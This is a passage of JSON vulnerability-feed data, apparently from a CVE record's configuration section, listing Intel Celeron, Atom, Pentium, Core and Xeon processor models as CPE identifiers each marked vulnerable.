              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2940:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2815:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2810:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j3455:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j3355:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j3160:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3405:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3265rk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3795:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3785:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3740d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3740:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3736g:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3580:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3570:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2560:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2520:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3815:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3805:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3750:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3758:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3958:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2758:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2338:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2308:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3540:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n3530:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_j:j2900:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_j:j2850:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3160:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3350:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2830:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2820:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j4105:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j4005:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j1750:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3445:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3200rk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3130:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3745d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3745:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3735d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3590:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2760:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2580:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3827:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3826:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3825:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3558:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3708:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3950:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3955:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2508:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2358:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2516:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2350:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3550s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3550:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3437u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3427u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3339y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3337u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2557m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2550k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2500k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2500:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2405s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2400s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:680:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:480m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:650:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:580m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:520e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2316:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3610me:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3475s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3470t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3380m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3360m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3330s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3330:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2540m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2537m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2467m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2450p:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2400:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2390t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:760:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:750s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:750:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:560um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:560m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:460m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:450m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3229y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3227u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3130m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:3120me:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2367m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2365m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2312m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2310m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2105:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:2102:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:530:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i3:380um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2920xm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:990x:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3820qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3770t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_n:n4200:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_j:j4205:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:pentium_j:j3710:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3060:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n3150:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2910:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2840:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2806:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_n:n2805:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3687u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3667u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3610qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:3610qe:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2860qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2820qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2670qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2675qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2657m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2629m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:2620m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:860:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:820qm:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:930:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:880:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:680um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:660um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:620ue:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i7:620m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x3430:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l3426:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5560:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:lc5518:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l5530:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l5520:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5506:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5504:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5675:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x5672:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l5638:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l5630:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5607:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:e5606:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:x7542:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon:l7555:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1505l_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1501l_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1501m_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1230_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3_1225_v6:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1558l_v5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:xeon_e3:1545m_v5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j1850:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:celeron_j:j1800:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3230rk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_x3:c3205rk:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3770d:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3770:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3735f:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3735e:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3480:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z3460:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_z:z2420:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_e:e3845:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3508:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3538:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3858:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c3830:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2558:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2538:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2518:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2550:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:atom_c:c2530:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3570k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3570:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3450:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3439y:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3340m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3340:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3317u:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:3230m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2500t:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2500s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2430m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2410m:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2310:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:2300:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:660:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:655k:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:h:intel:core_i5:520um:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
